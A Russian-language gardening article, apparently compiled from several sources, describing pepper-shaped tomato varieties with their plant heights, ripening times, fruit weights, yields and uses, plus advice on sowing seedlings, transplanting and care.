1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сорта перцевидного томата

Перцевидные сорта томатов: отличительные черты распространенных видов

Перцевидный – среднесозревающий сорт томата, исключительно урожайный: с куста удается собрать до 30 кг помидор. Оттенки сливовидных плодов разнятся от желтого до оранжевого и насыщенно-красного. Томаты имеют сладкую, мясистую рассыпчатую мякоть. Семян внутри содержится немного. Вкусен томат Перцевидный свежим, фаршированным, получаются отличные консервы из цельных помидор, из него изготавливают пасты и пюре. Вес в 80-100 г – средний для этих сортов, при соблюдении агротехники – до 120-150, помидоры растут кистями, по 4-9 ягод в каждой.

Первое соцветие находится под 9-12 листом. Выше кисти отстоят между собой на 3 листа. Высота кустов отдельных разновидностей до 1,5-2 м. Их обязательно необходимо подвязывать, формировать, прищипывать соцветия и веточки, тогда кисти с плодами распределяются равномерно. Выращивают перцевидные сорта томатов в открытых грядках и теплицах. На грядки высаживают ростки в мае-июне, после потепления до 10 градусов и выше – при большей прохладе завязь не образуется. Средний период вегетации – 112-120 дней. Плодоносят кусты с середины лета до конца сентября. Сортов перцевидной разновидности томатов существует много.

Перцевидные разновидности томатов

Это ряд плотных и мясистых, высокоурожайных сортов. Универсальные – вкусные плоды употребляются сырыми и в заготовках. Форма помидор напоминает болгарский перец, различаются они цветом и имеют небольшие отличия в периодах вегетации, высоте кустов и весе плодов. Характеристика таких сортов представлена далее.

Томат Перцевидный гигант

Выращивается преимущественно в теплицах. Сбор урожая – спустя 100-120 дней после первых всходов. Высота крупного куста – 1,5-2 м, в кистях обычно 5-9 удлиненных (до 15 см) перцевидных помидоров весом 150-200 г. Урожайность – до 6 кг/м2.

Поверхность плодов гладкая, равномерно красная. Мякоть плотная и мясистая, семян в 3-4 камерах не слишком много. Помидоры душистые, сладковатые, с превосходным вкусом. Оставляемые отзывы о томате Перцевидный гигант характеризуют его плоды как универсальные – они подходят для свежих салатов, зимних консервов, замораживания, тушения, вяления.

Томат Перцевидный красный

Сорт среднеранний, плодоносит по прошествии 105-110 дней после всходов. Выращивается в открытой или защищенной почве. Теплицы для выращивания подходят пленочные и стеклянные. Хорошо растет в нетяжелых, плодородных почвах. Высота сильнорослого куста достигает 1,6 м.

Плоды удлиненные, формы болгарского перца, с острым «носиком», выравненные, ярко-красные, до 120 г весом. Ценится томат Перцевидный красный за длительное обильное плодоношение. Плоды плотные, мясистые, с насыщенным вкусом и с толстой кожей. Хорошо хранятся и выносят длительные перевозки. Универсальны в употреблении – едят свежими, консервируют целиком, засаливают, сушат и замораживают, изготавливают соки и пасту.

Томат Перцевидный оранжевый

Раннеспелый сорт, подходит для теплиц. Период до плодоношения значительно короче, чем у других сортов – 85-90 дней. Кусты сильнорослые, до 1,5-1,8 м высотой.

При культивировании формируют 1-2 стебля. Урожайность до 7-8 кг/м2.

Ценные качества сорта:

  • длительное обильное плодоношение;
  • теневыносливость;
  • стойкость к целому перечню болезней;
  • большое содержание сухого вещества;
  • высокое содержание витамина С, каротина.

Плоды крупные, перцевидные, в кистях – по 3-4 штуки. Масса плодов – 135-170, иногда – до 300 г. Существующие отзывы о томате Перцевидный оранжевый характеризуют его как сорт универсального использования – он хорош и сырым, и в цельноплодном консервировании, в засолке. Мякоть плодов плотная и мясистая, сочная и нежная, кожица толстая и прочная, не растрескивается при консервировании.

Томат Перцевидный желтый

Сорт среднеспелый – плодоносит через 116-120 дней после всходов. Куст малооблиствленный, высотой 180 см.

При выращивании оставляют 1 стебель, его подвязывают, прищипывают. Урожайность с куста при соблюдении технологии выращивания – до 3,5 кг.
  1. любит плодородные почвы;
  2. умеренная требовательность к влаге;
  3. свето- и теплолюбивый сорт;
  4. повреждается заморозками;
  5. плодоношение длительное.

Выращивается томат Перцевидный желтый в пленочных теплицах и под открытым небом. В кистях – 5-6 помидор весом до 150 г. Плоды продолговатые, снаружи – оранжевые, внутри – ярко-желтые, малосеменные, ароматные. Содержание кислот понижено. Употребляются сырыми или консервируются в цельноплодном виде. Красиво, когда в закатке желтые плоды чередуются с такой же формы красными.

Томат Перцевидный полосатый

Сорт среднеспелый (110-115 дней до плодоношения), низкорослый. В высоту вырастает до 70 см (в теплицах – до метра). Растения крепкие, хорошо облиствленные. Оптимально формировать 3-4 стебля. Завязывается в течение сезона на кусте до 5 кистей с 6-9 15-сантиметровыми в длину помидорами, весом 80-150 г. Собирают до 7 кг плодов с 1 м2.

Существующие отзывы о томате Перцевидный полосатый отмечают оригинальный вид – красные и в желтую извилистую полоску, форму (на поминающую болгарский перец, с острым «носиком») и отличные вкусовые качества. Содержат много сухого вещества. Шкурка у них плотная, не склонна трескаться при цельноплодном консервировании. Плоды вкусны свежими и хороши для консервации – при термической обработке сохраняются плотными, не меняют цвет и не раскисают.

Высокорослые сорта томатов

Сорта сходны между собой. Одинаково высокорослые – свыше 2 м в высоту, отличаются невосприимчивостью к болезням. Различаются цветом, размером плодов и показателями урожайности.

Томат Чухлома

Имеет рослые, выше 2 м высотой, кусты, урожайность – 4,5-5,5 с каждого. В соцветиях – по 12-15 плодов в 12-15 см и весом 11-120 г. Из-за повышенного содержания каротина помидоры имеют ярко-оранжевый окрас. Мякоть у них плотная, а кожица – прочная, благодаря чему они отлично хранятся и транспортируются, хорошо консервируются.

Выращивается куст в 1 стебель. Положительные отзывы о томате Чухлома объясняются свойствами самих плодов, высокой урожайностью и стойкостью сорта к характерным для томатов болезням.

Томат Хохлома

Сходен с Чухломой томат Хохлома — такой же сильнорослый, больше 2 м высотой. Выращивать рекомендуется под временными укрытиями из пленки и в холодных теплицах. На рассаду он высевается в марте, а в мае высаживается в теплицы. Кусты формируют в единый стебель. Растения крепкие и рослые, не восприимчивые к табачной мозаике, фитофторозу, фузариозу и кладоспориозу.

Когда упоминают томат Хохлома – описание сорта начинается с высокой урожайности – до 8,5-10 кг с куста. Плоды банановидные, весом 120-150 г, с тонкой, но плотной кожицей, плотной сочной мякотью и ярко-красного цвета, одинаково внутри и снаружи. Вытянутая форма делает их удобными для консервирования – помидоры плотно укладываются в банку, не образуя пустот. Кожица не растрескивается.

Сорта томатов для неблагоприятного климата

Ряд томатов, специально выведенных для сибирского климата. Устойчивы не только к прохладе и погодным изменениям, но и заболеваниям.

Томат Сибирская тройка

Хорошо подходит для нечерноземных почв и не слишком благоприятных для томатов погодных условий сорт Сибирская тройка.

Его выращивают под открытым небом, пленочными укрытиями, в неотапливаемых теплицах. Высота куста – около 60 см, урожайность – до 5 кг с куста. При сравнительно невысоком росте отмечается крупноплодность сорта (150-300 г, до 15 см в длину).

Отдельные огородники, оставляющие отзывы о томате Сибирская тройка, отмечают несколько более позднее созревание плодов по сравнению с другими среднесозревающими сортами.

Полученный сибирскими селекционерами томат Сибирская тройка – описание сорта включает моменты:

  • компактность кустов;
  • урожайность;
  • крупноплодность;
  • отличный вкус;
  • долгосрочность хранения плодов;
  • стойкость к паразитам и болезням.

По применению сорт универсален – идет в сыром виде и на консервирование. При термической обработке сохраняет вкусовые и полезные свойства, не растрескивается.

Томат Перцевидный крепыш

Сорт, выведенный сибирскими селекционерами для открытого грунта. Адаптирован к климату Западной Сибири. Ранний – плодоношение на 105-110 день. Компактный куст достигает высоты 30-40 см, формовки и подвязки не требует. На полив и подкормку комплексными удобрениями реагирует хорошо. Болезнестойкий сорт, обладает частичным иммунитетом к вирусам. Собирают до 4 кг помидор с 1 м2.

Плоды томат Перцевидный крепыш дает вытянутые, крупные (до 150 г), малиновой окраски. Вкусны они и свежими, и консервированными.

Томат Золотая рыбка

Среднеспелый сорт, время созревания – 112-125 дней. Кусты рослые, 2-метровые, светло-зеленого окраса. Размер требует подвязки, необходимо формировать кусты. Отмечают отзывы о томате Золотая рыбка свойство расти и обильно плодоносить в неблагоприятных условиях – переменной температуре, чрезмерной дождливости. Высокая стойкость к заболеваниям. Необходимы полив, прополка, рыхление и подкормка минеральными удобрениями. Урожайность – стабильная, до 9 кг/м2.

В кисти – до 6 штук плодов весом 95-115 г с плотной и мясистой мякотью. Форма вытянутая, цилиндрическая, с острым носиком на конце. Окрас оранжевато-желтый. Аллергены в помидорах этого сорта отсутствуют, зато содержат много бета-каротина. Сладкие, очень вкусные плоды хороши для цельноплодного консервирования и в свежем виде. Транспортабельны. Шкурка плотная.

Необычные сорта томатов

Следующие два сорта с плодами интересной, очень характерной бананоподобной формы. Помидоры плотные, но суховатые – из-за этого вкус свежих плодов не слишком насыщенный. Зато заготовки получаются отличные.

Томат Аурия

Высокорослый среднепоздний урожайный сорт. Дается описание томата Аурия как лиановидного растения, достигающего 2 м, которое выводится в 2 стебля. Сравнительно тонким, не мощным побегам требуется своевременная подвязка. Кисти с плодами крупные – до десятка, реже – до 20 плодов. Из них крупных – 4-5 штук, остальные – средние и мелкие. Средняя длина плода 12-14 см. Средняя масса – 60-80 г, может доходить до 150 г.

Отличаются томаты сорта Аурия характерной формой – вытянутые плоды со слегка раздвоенным концом. Мясистые, с двумя семенными камерами с немногочисленными, равномерно расположенными вдоль плода мелкими семенами.

Вкусовые качества, которыми обладает томат Аурия – описание сорта определяет, как пресноватое, даже суховатое.

Оставляемые отзывы о томате Аурия подчеркивают отличный вкус заготовок из него. Так, пасту не требуется долго уваривать, поскольку воды в плодах содержится не слишком много, и получается она нежной и сладкой. А цельные плоды удобно укладываются в банки и не растрескиваются.

Томат Эрос

Абсолютный аналог Аурии, повторяющий оригинальную форму ее плодов – такие же удлиненные, раздвоенные на конце. Разница в окраске – если Аурия красная, то томаты сорта Эрос – оранжевые, и они несколько мельче.

Сорт среднеспелый, вызревает за 111-115 дней. Устойчив к различным болезням. Куст сильнорослый, до 1,8-2 м. Предпочтительно формирование в 3 стебля. Сорт суперурожайный. В кистях по 5-7 плодов, иногда – до 10, до 150 г весом.

Плотные плоды ярко-оранжевой окраски содержат мало семян (изредка бывают немного пустотелыми), устойчивы к переспеванию и растрескиванию. Универсальны – хороши и сырыми, и для цельноплодного консервирования. Хранятся плоды до 2-3 недель. Посмотрите статью: Черные томаты: лучшие сорта, их краткие качественные характеристики.

Выращивание перцевидных томатов

Помидоры выращивают на садовых участках всех регионов страны, но иногда существуют серьезные препятствия, которые не позволяют выращивать классические сорта. Томат перцевидный – высокоурожайный тип помидоров, который устойчив к резким перепадам температур и большинству заболеваний.

Разновидности

Перцевидный тип помидоров включает несколько гибридных сортов, которые представлены низко- и высокорослыми растениями с повышенной устойчивостью к большинству существующих заболеваний. Помидоры обильно плодоносят в условиях открытого грунта и теплицах.

Селекционеры создали разнообразие сортов, чтобы удовлетворить потребность даже удаленных регионов в обильно плодоносящих помидорах. Особенно ценят разновидности с желтыми и красными плодами, поскольку они приносят наибольший урожай.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Биологический вид томата имеет 3 подвида:

  1. Культурный — как правило плоды округлые или уплощенные, довольно крупные.
  2. Полукультурный — плоды имеют грушевидную, сливовидную, удлиненную форму. Плоды средние по размеру.
  3. Дикий -(смородиновый, кистевидный) — плоды мелкие, чуть крупнее паслена.

Перцевидные томаты были получены селекционерами с использованием полукультурного подвида.

Полосатый

Среднеспелый сорт, который готов к употреблению через 115 дней после высадки семян на рассаду. Плодоношение начинается со второй декады июля и заканчивается не позднее конца сентября. Полосатый вид помидоров подходит для открытого грунта (вырастает до 1 м) и теплиц, в которых куст достигает 120-130 см.

Кусты крепкие, с пышной надземной частью. Листья темно-зеленые. Растения формируют по 5-6 кистей, которые завязывают от 8 до 10 плодов. Тепличные экземпляры выращивают в один стебель, в открытом грунте – в 2-3 стебля, которые подвязывают, чтобы побеги не сломались под собственной тяжестью.

Плоды внешне похожи на перец. Им свойственна цилиндрическая, удлиненная (до 15 см) форма, а вес достигает 120-160 г. Полосатый помидор плотный, гладкий, имеет красно-жёлтый оттенок, который напоминает тигриный окрас. Мякоть сочная, плотная, мясистая и нежная.

Томат перцевидный Полосатый устойчив к большинству заболеваний, свойственных этой культуре. Спокойно переносит температурные перепады, прямые солнечные лучи и слабый полив.

Плодоношение обильное: с одного куста этого сорта собирают не менее 7 кг помидоров, а при соблюдении агротехники урожай достигает 10 кг. Томаты можно употреблять в свежем виде и использовать для зимних заготовок, особенно консервации в целом виде.

Желтый

Прототипом для создания этой разновидности послужил американский помидор Банановые ноги. Среднеранняя культура плодоносит в условиях открытого грунта и теплиц. Высота куста составляет 120 см, иногда достигает 150-180 см. Листья редкие, темно-зеленые. Желтоплодный сорт вид имеет простой тип соцветия.

Отличительная характеристика данного сорта – образование небольших ровных плодов цилиндрической формы. Томаты созревают по 6 шт. на одной кисти и весят не менее 70 г каждый. Собирать урожай начинают, когда плод приобретает желтый цвет. Мякоть помидоров сочная, ароматная.

Томат перцевидный желтый устойчив к грибным заболеваниям, перепадам температур и засухе, но продолжительное похолодание вызывает остановку вегетационного процесса. В регионах с поздними весенними заморозками высадку в грунт откладывают до стабилизации температурных показателей.

Желтоплодный сорт помидора приносит от 3 до 6,5 кг урожая с одного куста при соблюдении всех требований по уходу. Плоды подходят для салатов, зимних заготовок (консервирование и засолка).

Оранжевый

Помидор перцевидный оранжевый – раннеспелый тепличный сорт, который не приспособлен к открытому грунту из-за угрозы поздних заморозков. Плоды созревают через 90 дней после высевания семян на рассаду.

Высота куста индетерминантного сорта – 1,5-1,8 м. Ветвистое растение склонно к формированию многочисленных пасынков. Листья среднего размера, светло-зеленого оттенка. Куст с редкими промежуточными соцветиями, которые завязывают до 6 плодов на одной кисти.

Длина плодов – до 15 см, средний вес одного помидора достигает 150-200 г. Кожица толстая, имеет ярко-оранжевый оттенок. Плод имеет мягкую, сочную мякоть и 3-4 семенных камеры.

Растения устойчивы к заболеваниям, но не переносят температурные перепады, которые останавливают рост и плодоношение. Раннеспелый сорт приносит до 5-6 кг помидоров с одного куста, которые употребляют в свежем виде или консервируют. Томат перцевидный оранжевый богат каротином и витамином С, поэтому подходит для тонизирующих соков в зимний период.

Крепыш

Томат перцевидный Крепыш создан специально для климата Сибири, где теплый сезон ограничен. Его выводили для выращивания в условиях открытого грунта. Раннеспелый сорт: плодоношение наступает через 110 дней после появления первых всходов.

Штамбовое растение достигает всего 0,4 м в высоту, оно нетребовательно к пасынкованию и подвязыванию. Такое название культура получила благодаря крупному размеру куста.

Плод цилиндрической формы, с плотной кожицей, которая на стадии зрелости приобретает розовый оттенок. Характерный признак – небольшое пятно зеленоватого оттенка у плодоножки. Мякоть помидора сочная.

Низкорослые растения приспособлены к выращиванию в условиях любой климатической зоны, поскольку были выведены специально для холодных регионов с низкой освещенностью Они устойчивы к большинству известных заболеваний.

Крепыш – среднеурожайный вид. С одного куста собирают не более 4 кг плодов за сезон. Помидоры используют для салатов, консервации, изготовления соков, томатных соусов и др.

Кубинский

Кубинский черный подвид относят к среднеспелым сортам, поскольку первые плоды собирают через 120 дней после посева. Культура самостоятельно не прекращает рост. Тепличные экземпляры достигают 3 м, а выращенные в условиях открытого грунта – 150 см.

Кубинский помидор требует обязательного пасынкования и подвязывания, в противном случае растение не выдержит собственного веса.

Куст хорошо облиственный, с обычными листьями и мощным стеблем. Формируют растения в несколько стеблей, что повышает урожайность. Плоды массивные, перцевидной формы и достигают 200-350 г. Кубинский собирают с грядки, когда кожица приобретает цвет бордо. Мякоть помидоров сочная, мясистая.

Описание вида будет неполным без упоминания его устойчивости к различным заболеваниям и вредителям: фитофтороз, паутинный клещ. Томат Кубинский перцевидный – высокоурожайный сорт, который приносит до 7 кг плодов с одного куста, а при выращивании в 2-3 стебля эти показатели достигают 10 кг. Помидоры употребляют в свежем виде или заготавливают на зимний период.

Королевский

Эту разновидность перцевидных томатов можно выращивать как в условиях открытого грунта, так и теплице. Приобретать семена нужно от компании «Седек». В противном случае можно получить плохой урожай, не соответствующий заявленным характеристикам.

Королевский помидор относят к среднеспелым видам, которые начинают плодоносить на 107 день после прорастания.

Это индетерминантное растение, высота которого составляет более 1,7 м. Куст малооблиственный, с типичными для томатов листьями. Плоды небольшие, продолговатые, средняя масса достигает 85 г. Помидоры готовы к сбору, когда они приобретают ярко-красный оттенок. Кожица плотная, устойчива к растрескиванию. Мякоть мясистая, сочная, имеет сладкий вкус.

Гибрид устойчив к распространенным заболеваниям, хорошо переносит транспортировку и обладает продолжительным сроком хранения. Томат дает обильный урожай, который отлично подходит для употребления в свежем виде и засолки.

Минусинский

Овощная культура подходит для выращивания в разных регионах, но в областях с суровым климатом его нужно культивировать в специализированных теплицах. Среднеспелый сорт приносит урожай на 110-112 день после появления первых ростков.

Минусинский длинный сорт формирует кусты не менее 2 м с малооблиственными побегами. Главная особенность овощной культуры – слабый стебель, который требует дополнительной опоры. Растение подвязывают с помощью тканевых лент к кольям, которые вбивают рядом со стеблем.

Характеристика выделяет отличительный признак плодов сорта – форму, напоминающую стручковый перец. Длина помидоров составляет 10-12 см, а масса – 80-100 г. Плод ярко-красный, с плотной кожицей и мясистой, умеренно сочной мякотью.

Томат устойчив к большинству заболеваний, что важно при тепличных условиях выращивания. Соблюдение агротехники поможет собрать с одного куста не менее 5 кг за сезон. Сладкий и яркий помидорный вкус делает плоды идеальным сырьем для приготовления соков, соусов, паст, а также консервирования.

Красный

Среднеранний сорт выращивают в условиях открытого грунта и теплице. Первые плоды поспевают максимум на 110 день после появления ростков. Почву для томата подбирают питательную и нетяжелую.

Куст достигает не более 1,6 м в высоту, обладает зеленой массой средней густоты, имеет темно-зеленые листья. Красный подвид приносит томаты весом в 120 г, удлиненной формы, с заостренным носиком. Кожица тонкая, имеет красный оттенок и насыщенный, сладкий помидорный вкус.

Описание будет неполным без упоминания главной особенности помидора – обильного плодоношения, благодаря которому сорт лидирует среди всех подвидов. Как и все гибриды, томат перцевидный красный устойчив к распространенным заболеваниям, которым подвержены все сорта помидоров. Подходит он для салатов, консервации и заморозки.

Розовый

Розовый томат имеет средний срок плодоношения, урожай собирают через 110 дней после появления всходов. Выращивают его в открытом грунте и теплицах, которые требуют хорошего вентилирования, чтобы не застаивалась влага.

Низкие кусты достигают не более 150 см в теплицах, в открытом грунте они вырастают до 1-1,2 м. Растение среднеоблиственное. Рекомендуют формировать сорт в один стебель и подвязывать кисти, которые могут поломаться от количества помидоров.

Плод крупный, достигает массы в 180 г. Кожицы на стадии созревания помидора приобретает малиновый оттенок, а мякоть – мясистость и сочность.

Растения устойчивы к грибным заболеваниям и распространенным вредителям. Урожайность одного куста небольшая и составляет 3,5 кг за сезон. Благодаря малиновому цвету помидоры красиво выглядят в салатах и банках.

Кольчуга

Помидоры Кольчуга относят к индетерминантным растениям, которые требуют формирования и подвязки. Среднеспелый сорт подходит для выращивания в открытом грунте. Главная особенность – обильное плодоношение. С куста за сезон снимают не менее 6,5 кг.

Масса плодов в момент зрелости – не менее 80-100 г, а кожица приобретает красный оттенок. Мякоть мясистая, сочная, насыщенная сахарами и витаминами. Сорт универсален в применении, благодаря сладкому вкусу плодов. Помидоры едят в салатах, закатывают в банки на зиму.

Правила выращивания

Хороший урожай можно получить только из качественного посевного материала

Крупноплодные перцевидные помидоры требуют соблюдения определенных правил, которые помогают получить обильный урожай, а при благоприятных условиях – увеличить его количество. Главный нюанс при выращивании гибридных сортов – выбор качественного посевного материала.

Семена нужно покупать у тех организаций, которые запатентовали технологию создания и предоставляют сертифицированный материал. При покупке в непроверенном месте существует риск приобретения некачественного товара, который снизит урожайность или вовсе не даст всходов.

Посев семян на рассаду

Высевать семена на рассаду начинают в первом месяце весны. При этом дни подбирают с учетом благоприятных лунных фаз. Землю заготавливают заранее или покупают питательный субстрат. Самостоятельно приготовить его можно, смешав дерновую землю, перегной, песок. Также в почвосмесь добавляют суперфосфат (2 ст. л) и золу (5 ст. л).

Подготовленную емкость (деревянный ящик) засыпают субстратом. Карандашом прочерчивают длинные полосы и выкладывают семена (они не требуют предварительной обработки) на расстоянии 3 см друг от друга, затем их присыпают землей. Увлажняют, закрывают пленкой и отправляют в теплое место (25 °C), пока не появятся всходы.

Далее пленку снимают и перемещают емкость на хорошо освещенное место.

На стадии формирования 2-3 листьев рассаду пикируют в торфяные горшки, которые заполняют субстратом, по составу схожим с первоначальным. За 14 дней до высадки в открытый грунт рассаду начинают закалять, вынося ее на воздух. Время пребывания на улице увеличивают с 30 мин. до 8 ч.

Пересадка в открытый грунт

Томат перцевидный не высаживают на участки, где раньше рос картофель. Выбирают место с плодородной, некислой почвой. Грунт с осени удобряют компостом. Перед посадкой грядки очищают от сорняков, перекапывают и разравнивают граблями.

  • выкапывают лунки (не более 4 на 1 м²);
  • дно покрывают суперфосфатом и увлажняют;
  • помещают в ямки сеянцы вместе с земляным комом, чтобы не повредить корни;
  • засыпают землей и слегка утрамбовывают;
  • посадки поливают водой.

Характеристика гибридных растений указывает на их нетребовательность в уходе, но стандартные правила стоит выполнять тщательно, т.к. их соблюдение непосредственно влияет на урожайность.

Основные рекомендации по уходу:

  • полив. Низкорослые томаты перцевидные увлажняют при посадке в открытый грунт, через 7-10 дней после нее, в период формирования завязи и в конце июня. Высокорослые сорта требуют частого полива, который проводят в среднем 1-2 раза в 7 дней (в зависимости от погодных условий);
  • подкормка. Первичное внесение удобрений (навоз или куриный помет) происходит через 10 дней после высадки, вторичное – в период активного цветения (древесная зола);
  • пасынкование. Помидорные кусты требуют правильного формирования, а также удаления боковых побегов, пока они не достигли 5 см.

Красный, желтый, полосатый, или все, что вы должны знать о Перцевидных томатах

Достижения селекции впечатляют, и сегодня огородники высаживают на участках не только традиционные и всем привычные круглые помидоры, но и популярные перцевидные томаты. В этой группе – более десятка видов, различающихся по цвету, размеру плода, особенностям агротехники.

Изначально наши трудолюбивые дачники приобретали (а скорее «доставали») зарубежные сорта и гибриды. Но, начиная с 2001 года появились томаты перцевидные российской селекции, и здесь выбор, действительно, огромный. В нашем обзоре представлены разновидности сорта, дана подробная информация с фото, что позволит вам более точно определиться с выбором.

Начнем с помидоров, которые нашли «прописку» в каталоге Государственного реестра. И самым первый среди них – Перцевидный сорт, зарегистрированный в 2001 году.

Спрашивайте и получайте полезные советы от профессиональных садоводов и опытных дачников.Задать вопрос >>

Перцевидный

Оригинатор сорта – компания «НК. ЛТД» (Московская область). Куст высокий, мощный, индетерминантного типа. Точка роста отсутствует, в теплицах растение достигает 1,8-2 метров.

Помидор среднеспелый, плоды готовы к уборке уже через 110-115 дней. Форма помидорок – цилиндр, с небольшой ребристостью. У некоторых незрелых плодов имеется зеленое пятно возле плодоножки, сами помидоры – светло-зеленые, при созревании – ярко-красные. Вес небольшой, 80-100 граммов, хотя бывают экземпляры покрупнее.

Мякоть мясистая, внутри две камеры с малым количеством семян. Стенки плотные, что делает их пригодными для приготовления фаршированных блюд. Вкус хороший, использование – универсальное.

Желтый

В 2007 году в Государственном реестре появилось сразу два интересных томата, среди которых и Перцевидный желтый.

Высокорослый индет поражает мощью растения, большими темно-зелеными листьями. Облиственность небольшая, высота стебля – 1,7-1,9 метров.

Через 115-117 дней снимают первые помидорки. Этот сорт подходит для теплиц и открытого грунта. Оставляют один ствол, удаляя все боковые побеги. По урожайности показатели не особо высокие – до 3-3,5 кг с одного квадратного метра, но ценят эту разновидность за превосходный вкус плодов.

Соцветия простые, плоды похожи на «собрата» — томат Перцевидный красный. Стеночки у них плотные, на поверхности есть малая ребристость. Окраска – ярко-желтая.

  • Замечательные вкусовые качества;
  • засухоустойчивость;
  • стойкость к ВТМ, различным видам гнилей;
  • длительный период плодоношения.

Помидор требователен к хорошему освещению, плодородию почвы. Оригинатор – известный селекционер Л.А. Мязина. Помидоры используются в салатах, идеальны для консервирования, засолки.

Оранжевый

Оригинальной окраской плодов отличается помидор Перцевидный оранжевый, который ценится еще и за высокую урожайность (до 9-10 кг с одного кв. метра). В Государственном реестре РФ – с 2007 года.

Относится к типу индетерминантных томатов, куст сильнорослый, высокий (до 1,8 метров). В Сибири и других суровых регионах высаживают в укрытия, на юге он отлично плодоносит на грядах. Лучший вариант – использовать в укрытии для опоры шпалеры. Ведут куст Оранжевого в 1-2 стебля, подвязывая кисти, когда на них зреют плоды.

Довольно крупные плоды весят 150-170 граммов, при выращивании растения без дополнительных стеблей помидоры весят до 280-300 граммов. Кожица плотная, но без жесткости, мякоть мясистая, нежная. Вкусовые качества томата отличные. Использование универсальное, и это также одно из достоинств Перцевидного оранжевого.

К «плюсам» сорта относят:

  • неприхотливость;
  • слабую подверженность болезням;
  • длительное плодоношение.

Судя по отзывам огородников, плоды у Оранжевого подходят для консервирования целиком. Красиво смотрятся они вперемешку с зелеными огурчиками, помидорами красной и желтой окраски.

Гигант

2007 год – время появления в Государственном реестре томата Перцевидный гигант.

Характеристика и описание сорта идентичны вышеописанным томатам, различия кроются в конфигурации плодов, и в окраске. У Гиганта помидоры слегка вытянутые, насыщенно красного цвета, весом до 200 граммов. На кустах оставляют 1-2 стебля, пасынкование обязательно. В кистях образуется по 5-9 плодов, общая урожайность – 5,5-6,5 кг с одного квадратного метра.

Кожица твердая, с глянцем. Плоды с плотной мясистой мякотью, внутри – 3-4 камеры, семян немного. Вкус помидоров хороший, это отмечают все, кто сажал Перцевидного Гиганта у себя на участке.

Куда использовать помидоры? В салаты, также вкусны они в засолке, консервации. Хозяйки замораживают и вялят, используют для фаршировки.

Крепыш

В 2014 году каталог Государственного реестра пополнил новый томат от алтайских селекционеров – Перцевидный крепыш. От всех своих «сородичей», уже зарегистрированных в списке, он выделился высотой. Томат Перцевидный крепыш детерминантного типа, по высоте не более 30-40 см.

Кустики компактные, с небольшой облиственностью, пасынки у растений не удаляют. Но помните, что требуется подвязка к опоре на грядках, так как под тяжестью плодов ветки обламываются. Показатели урожайности – до 4-4,5 кг с одного квадратного метра. Первые помидоры-перчики снимают через 105-107 дней.

Плоды вытянутые, вес – 120-140 граммов, внутри три камеры. Семян мало. Окраска кожицы в состоянии технической спелости – зеленая, при созревании – темно-малиновая. У некоторых плодов возле плодоножки присутствует темно-бордовое пятно.

Огородники отмечают отличный вкус, что впрочем, характерно для всех томатов данной группы. Пригодны плоды для засолки, зимних салатов, для переработки. К «плюсам» Крепыша относят:

  • компактность растений;
  • стойкость к болезням;
  • неприхотливость;
  • хороший вкус помидоров.

Сорт хорош для Сибири, Северо-Запада, Урала, где теплый сезон непродолжителен, и лето часто прохладное.

Красный

В 2015 году в Госреестре зарегистрировали сорт Перцевидный красный (агрофирма «Аэлита»). В высоту растения достигает почти два метра, отличается длинными листьями, формирует сложные соцветия. По срокам – среднеспелый томат, что вполне подходит как для средней полосы, так и для северных регионов. Помидорки перцевидные, с ребристой поверхностью, похожи на красные сладкие перчики. Вес – 120-150 граммов.

Описание помидоров: спелые плоды ярко-красного цвета, кожица глянцевая, плотная. Мякоть мясистая, число камер – 3-4. Вкус помидоров отличный, при этом неплохие показатели урожайности – до 2,5-3 кг с одного куста. Как и многие другие томаты с плодами перцами, используют Красный для консервации, засолки, употребляют свежим.

Малиновый

Сорт от селекционеров-сибиряков под названием Перцевидный малиновый предназначен для культивирования под открытым небом. Можно высадить его под укрытия, подойдут дуги или парники. Красивые плоды пригодны для всех видов переработки, вкусны в свежем виде, в солениях.

Томат детерминантного типа, невысокий, достигающий на огороде высоты 40-50 см. Плоды одновременно похожи на сладкий перец и эллипс, с очень гладкой глянцевой кожицей малиново-пурпурного цвета.

Внутри плодов – по 4-6 гнезд, семян мало. Вес помидоров достигает 150 граммов, но при специальном уходе можно вырастить плоды до 250 граммов. Мякоть мясистая, сахарная, приятного вкуса.

  • раннеспелость (100-102 дня);
  • отменный вкус помидоров;
  • неплохие показатели урожайности (до 8 кг с одного квадратного метра на грядках, до 15 кг – в теплицах);
  • стойкость к похолоданиям.

Сорта томатов от сибирских селекционеров адаптированы к суровым местным условиям, при этом они порадуют обильным плодоношением, хорошим вкусом.

Розовый

Оригинатор сорта – известная агрофирма «Аэлита», поставляющая на рынок семена самых разных томатов. Также семена сорта выпускает фирма «СеДек». В Государственном реестре Перцевидный розовый зарегистрирован в 2018 году, так что его вполне можно назвать новинкой.

Кусты высокие (до 1,6 метров), средней облиственности. У растения удаляют пасынки, обязательно формируют. Чаще всего оставляют два стебля (так выше показатели урожайности).

Помидоры удлиненные, с миниатюрным «хвостиком». Розовая кожица плотная, но тонкая, с блеском. По весу плоды ровные, примерно 80-100 граммов. Те, кто уже выращивал сорт, отмечают его сбалансированный вкус, аромат. Помидор относится к среднеспелым сортам, снимают первые плоды через 105-110 дней, урожайность в среднем – 6-7 кг с одного «квадрата».

Полосатый

Любителям оригинальных сортов рекомендуем томат Перцевидный полосатый. Его плоды – красно-оранжевые с золотой штриховкой отлично подходят дл салатов, консервации.

Растение невысокое (до 60-70 см), приземистое, сильно облиственное. Благодаря компактности помидор высаживают плотно на грядки, до 7-8 растений на один кв. метр.

Обычно этот томат формируют в 3-4 ствола, так как основной стебель быстро завершает рост цветочной кистью. На каждом кусте завязывается по 4-5 кистей, каждая содержит до 8 плодов.

По показателям урожайности этот сорт уступает другим перцевидным томатам, но у него другая ценность – необычная окраска плодов.

По отзывам, вкус у помидоров сорта Перцевидный полосатый хороший, но в мякоти бывают пустоты. Великолепен этот томат в консервации, заготовки выглядят нарядно. В маринадах и рассоле форму не теряет, кожица не трескается.

Кубинский

Этот сорт не внесен в Государственный реестр, что нисколько не умаляет его ценности. В каталогах коллекционеров томатов Кубинский встречается под другими названиями: Перцевидный черный, Кубинский черный. Те, кто предпочитает крупноплодные томаты, не должны пропустить этот сорт.

Самое привлекательное – это плоды, крупные, весом до 300-350 граммов и очень похожие на сочные сладкие перцы. Плотная кожица темно-красного, почти черного у плодоножки цвета, мякоть мясистая, семян очень мало.

